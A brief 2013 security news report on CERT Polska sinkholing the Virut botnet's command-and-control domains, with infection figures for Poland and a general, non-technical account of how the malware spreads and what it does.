22 Jan 2013
CERT Poland has taken down the central command and control servers of the Virut botnet, curtailing the activity of this zombie herder after confirming that systems infected with Virut were remotely controlled by crooks from those servers.
CERT sinkholed several domain names, including some associated through the years with other illegal activities lead by notorious botnets such as Palevo or ZeuS. Investigators used these apprehended domains to intercept communication attempts between compromised computers and crooks.
“NASK’s actions are aimed at protecting Internet users from threats that involved the botnet built with Virut-infected machines, such as DDoS attacks, spam and data theft,” CERT Polska writes. “The scale of the phenomenon was massive: in 2012 for Poland alone, over 890 thousand unique IP addresses were reported to be infected by Virut.”
Virut mainly spreads through infected files shared over networks or compromised removable media. More recent variants inject an IFrame into HTML files that trigger the download of Virut from a remote location. Once on the system, Virut connects to its C&C center and awaits instructions that may include downloading and installing more malware, sending spam or carrying out DDoS attacks.